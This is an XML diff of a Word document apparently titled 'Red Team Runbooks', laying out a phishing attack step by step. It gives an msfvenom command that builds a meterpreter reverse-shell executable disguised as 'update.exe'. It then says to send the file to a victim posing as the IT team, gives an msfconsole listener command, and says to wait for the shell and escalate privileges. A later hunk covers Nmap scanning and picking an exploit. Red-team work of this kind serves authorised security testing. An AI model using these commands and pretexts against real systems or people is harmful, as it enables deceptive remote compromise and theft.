+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1528" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Document </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Description</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="8116" w:type="dxa"/>
+            <w:gridSpan w:val="5"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>This is attack is a phishing attack where the attacker persuades the user to download the reverse shell created by msfvenom</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="395" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Step 1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:gridSpan w:val="3"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Task</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Complete</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1735" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Create malicious file</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:gridSpan w:val="3"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="PreformattedText"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="0" w:name="msfvenom-command"/>
+            <w:bookmarkEnd w:id="0"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=9001 -f exe -o update.exe</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="395" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Step 2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:gridSpan w:val="3"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Task</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Complete</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1837" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Send file to victim</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:gridSpan w:val="3"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:i w:val="false"/>
+                <w:iCs w:val="false"/>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Send file to victim with persuading text e.g. download update for software, email by IT team</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="395" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Step 3</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:gridSpan w:val="3"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Task</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Complete</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1716" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Listen for shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:gridSpan w:val="3"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="PreformattedText"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="1" w:name="listener-command"/>
+            <w:bookmarkEnd w:id="1"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.0.10; set lport 9001; exploit"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="48"/>
+                <w:szCs w:val="48"/>
+              </w:rPr>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="395" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Step 4</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:gridSpan w:val="3"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Task</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1285" w:type="dxa"/>
+            <w:tcBorders/>
+            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Complete</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1718" w:hRule="atLeast"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2022" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Connect to shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6337" w:type="dxa"/>
+            <w:gridSpan w:val="3"/>
+            <w:tcBorders/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
+              <w:bidi w:val="0"/>
+              <w:spacing w:before="0" w:after="160"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:b w:val="false"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:kern w:val="0"/>
+                <w:highlight w:val="none"/>
+                <w:shd w:fill="auto" w:val="clear"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:kern w:val="0"/>
+                <w:shd w:fill="auto" w:val="clear"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Wait for shell to land, priv esc if needed</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1285" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>

</xml_diff>

<commit_message>
updated observer and red book
</commit_message>
<xml_diff>
--- a/Red Team Runbooks.docx
+++ b/Red Team Runbooks.docx
@@ -37,12 +37,12 @@
         <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1525"/>
-        <w:gridCol w:w="497"/>
+        <w:gridCol w:w="1523"/>
+        <w:gridCol w:w="499"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
-        <w:gridCol w:w="1760"/>
-        <w:gridCol w:w="1282"/>
+        <w:gridCol w:w="1762"/>
+        <w:gridCol w:w="1280"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -502,7 +502,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1525" w:type="dxa"/>
+            <w:tcW w:w="1523" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -549,7 +549,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="8119" w:type="dxa"/>
+            <w:tcW w:w="8121" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -609,7 +609,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -637,7 +637,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -696,7 +696,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -717,14 +717,7 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t xml:space="preserve">Perform an aggressive Nmap scan and enumerate all open ports and their headers to determine if there is the vulnerable service. </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Look for things like ftp, smb, jenkins installs etc.</w:t>
+              <w:t>Perform an aggressive Nmap scan and enumerate all open ports and their headers to determine if there is the vulnerable service. Look for things like ftp, smb, jenkins installs etc.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -769,7 +762,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>
@@ -827,7 +820,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
@@ -855,7 +848,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
             <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
           </w:tcPr>
@@ -914,7 +907,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="6340" w:type="dxa"/>
+            <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
             <w:tcBorders/>
           </w:tcPr>
@@ -935,14 +928,27 @@
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
-              <w:t xml:space="preserve">Run the MSFconsole and select the exploit for the vulnerable service </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>(if the module doesn’t work, try the exploit manually)</w:t>
+              <w:t>Manually explore the service to identify possible exploits</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Normal"/>
+              <w:widowControl w:val="false"/>
